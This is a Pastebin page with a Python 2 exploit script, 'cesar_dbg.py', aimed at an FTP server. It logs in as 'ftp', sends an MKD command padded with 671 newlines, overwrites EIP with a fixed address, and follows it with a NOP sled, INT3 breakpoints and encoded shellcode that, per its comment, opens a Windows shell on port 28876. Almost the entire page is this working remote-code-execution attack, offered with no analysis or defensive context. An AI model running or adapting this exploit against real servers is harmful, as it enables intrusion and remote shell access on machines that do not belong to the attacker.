Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- # cesar_dbg.py
- from socket import *
- import struct
- eip = struct.pack('<i',0x77D8AF0A)
- host = "ip"
- port = 21
- user = "ftp"
- password = "ftp"
- # Shellcode will open windows shell on port 28876
- shellcode = (
- "\xd9\xcc\xb8\x84\x3b\xe0\x15\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
- "\x36\x31\x42\x19\x03\x42\x19\x83\xc2\x04\x66\xce\xd1\xdc\x02"
- "\xba\x63\xef\x41\xca\x8f\x84\x23\x2f\x1b\xf4\xc3\xc4\x65\x29"
- "\x58\xec\xa1\x66\x46\x64\x21\x29\x1e\xb4\x9a\xf9\xec\xd0\x42"
- "\xa8\x67\x52\xe3\xe3\x08\x9d\x6b\x82\xf0\x2b\x88\xbc\x30\x7a"
- "\x43\x37\x2f\xab\xa8\xe2\xee\x05\x0e\xa2\xa7\xf4\x13\xab\x6b"
- "\x53\x5c\xbf\x2e\xa7\xe8\xe3\xcd\xaf\xef\xf0\x66\x04\xd0\x07"
- "\x91\xcd\x21\xda\x23\x79\x75\x4b\xa2\x93\xc2\x5d\x08\x5f\x5a"
- "\x8a\x94\x9c\xed\xbf\xe3\xe7\x2a\x35\xe0\x46\xbe\xfe\xd2\x77"
- "\x29\x0f\xad\x6c\xf8\x9b\x9a\x90\xfb\x72\x95\x41\xf8\x80\x34"
- "\x3a\x7f\xb6\x3f\x48\x88\x4a\x61\xb6\xdb\xab\x4d\xe1\x4e\xd3"
- "\x53\x7d\x04\x65\xf5\x2c\x19\x55\xa4\xd0\x36\xc3\x37\x01\x49"
- "\x13\xb8\x6d\xdf\xfc\x91\x3c\x4a\x02\xcd\xba\xb5\x88\x15\xf5"
- "\xe7\x23\x8d\x95\x6a\xa0\x6d\xd7\x09\x0c\x55\x4c\x5a\xe7\x63"
- "\xd5\x74\xf9\x3f\x5d\xba\xde\xe8\x33\x91\x4c\xd0\xf3\xfa\x79"
- "\x8b\xa9\x56\x2d\x61\xb1\x01\x35\x0e\x0b\x52\x5c\xda\x6b\x55"
- "\x60")
- print "Lenght of shellcode: %d" % (len(shellcode))
- s = socket(AF_INET, SOCK_STREAM)
- s.connect((host, port))
- print s.recv(1024)
- s.send("user %s\r\n" % (user))
- print s.recv(1024)
- s.send("pass %s\r\n" % (password))
- print s.recv(1024)
- buffer = "MKD " # Command
- buffer += "\n" * 671 # Required parameter
- buffer += "OMG" # 3 bytes alpha char, also required
- buffer += eip # Control EIP
- buffer += "\x90" * 10
- buffer += "\xcc\xcc\xcc\xcc" # INT 3, break / pause the execution
- buffer += shellcode # Payload
- buffer += "\r\n" # Another required parameter
- print "Lenght of buffer: %d" % (len(buffer))
- s.send(buffer)
- print s.recv(1024)
- s.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement